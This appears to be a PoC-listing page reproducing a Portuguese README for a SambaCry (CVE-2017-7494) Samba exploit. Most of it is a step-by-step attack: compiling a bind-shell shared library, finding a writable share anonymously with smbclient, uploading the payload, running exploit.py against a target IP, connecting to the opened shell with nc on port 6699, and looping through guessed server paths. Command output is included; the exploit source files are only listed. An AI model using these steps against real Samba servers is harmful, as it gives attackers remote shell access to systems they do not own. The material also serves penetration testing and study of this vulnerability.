CVE-2017-7494 PoC — Samba 安全漏洞

Source

Associated Vulnerability

Description

SambaCry (CVE-2017-7494) exploit for Samba | bind shell without Metasploit

Readme

# CVE-2017-7494 SambaCry Exploit

Exploit SambaCry (CVE-2017-7494) para explorar Samba (bind shell sem Metasploit)

Caso necessite alterar a porta, basta alterar a linha nº 68 do *bindshell-samba.c* e recompilar:<br>
![image](https://user-images.githubusercontent.com/76706456/199360465-0ade3332-87b6-4c27-8adc-bbed6cc475d2.png)

```
gcc -c -fpic bindshell-samba.c
```
```
gcc -shared -o libbindshell-samba.so bindshell-samba.o
```
<br>

**Como explorar:**<br>

Veja os compartilhamentos (neste exemplo estamos usando um usuário anônimo):
```
smbclient -L //192.168.10.131/ -U "" -N
```
```
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	publico         Disk      Publico
	IPC$            IPC       IPC Service (maq131 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            CHORA
```
<br>

Acesse uma pasta e verifique se o usuário possui permissões de escrita:
```
smbclient //192.168.10.131/publico -U "" -N
```
<br>

Caso possuir permissões de escrita, envie o arquivo *libbindshell-samba.so*
```
smb: \> mput libbindshell-samba.so
```
```
Put file libbindshell-samba.so? yes
putting file libbindshell-samba.so as \libbindshell-samba.so (3.5 kb/s) (average 3.5 kb/s)
smb: \> dir
  .                                   D        0  Tue Nov  1 19:44:15 2022
  ..                                  D        0  Wed Jun 14 14:16:35 2017
  libbindshell-samba.so               A     8432  Tue Nov  1 19:44:17 2022

		3997376 blocks of size 1024. 1960284 blocks available
smb: \>
```
<br>

**Em seguida, basta executar o exploit:**<br>
`python2 exploit.py -t target_ip -m path_absoluto_server_side`<br><br>
Exemplo:
```
python2 exploit.py -t 192.168.10.131 -m /home/publico/libbindshell-samba.so
```

Conecte na porta 6699/TCP:
```
nc -vn 192.168.10.131 6699
```

![image](https://user-images.githubusercontent.com/76706456/199361239-069544a7-0ef1-4868-8f58-7e6db17f5e2b.png)
<br><br>

**Caso não souber o PATH absoluto do lado do servidor, convém realizar guessing e aguardar a porta 6699/TCP abrir:**
```
for i in $(cat paths.txt);do python2 exploit.py -t 192.168.10.131 -m $i/publico/libbindshell-samba.so 2>/dev/null;done
```

File Snapshot

 [4.0K]  /data/pocs/9700e9600ef60f2b37742de8ae0b1bcd29bd9942
├── [1.9K]  bindshell-samba.c
├── [  94]  bindshell-samba.h
├── [ 688]  exploit.py
├── [8.2K]  libbindshell-samba.so
├── [ 106]  paths.txt
└── [2.3K]  README.md

0 directories, 6 files

Remarks